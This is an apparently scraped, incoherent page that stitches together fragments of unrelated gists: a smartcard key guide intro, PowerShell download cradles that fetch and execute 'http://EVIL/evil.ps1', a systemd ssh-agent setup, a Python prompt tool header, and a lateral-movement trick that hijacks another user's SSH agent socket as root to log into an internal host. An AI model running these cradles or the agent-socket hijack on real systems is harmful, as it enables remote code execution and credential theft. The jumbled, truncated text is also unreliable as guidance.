Written for fairly adept technical users, preferably of Debian GNU/Linux, not for absolute beginners.
You'll probably be working with a single smartcard, so you'll want only one primary key ( |
# normal download cradle | |
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
# PowerShell 3.0+ | |
IEX (iwr 'http://EVIL/evil.ps1') | |
# hidden IE com object | |
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
# Msxml2.XMLHTTP COM object |
You'll probably be working with a single smartcard, so you'll want only one primary key ( |
Create a new systemd user unit, which starts ssh-agent
upon login to server. Will remain resident until the final session for the user has logged out.
Create /etc/systemd/user/ssh-agent.service
.
Run the following commands (under your user account, not root
) to install the systemd unit and start:
#!/usr/bin/env python | |
""" | |
Usage: vcprompt [options] | |
Version control information in your prompt. | |
Attribution: possible original author <Matthias Riegler https://github.com/xvzf>? | |
Options: | |
-f, --format FORMAT The format string to use. |
Unless otherwise noted (either in this file or in a file's copyright section) the contents of this gist are Copyright ©️2020 by Christopher Allen, and are shared under spdx:Creative Commons Attribution Share Alike 4.0 International (CC-BY-SA-4.) open-source license.
If you more tips and advice like these, you can become a monthly patron on my GitHub Sponsor Page for as little as $5 a month; and your contributions will be multipled, as GitHub is matching the first $5,000! This gist is all about Homebrew, so if you like it you can support it by donating to them or becoming one of their Github Sponsors.
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tld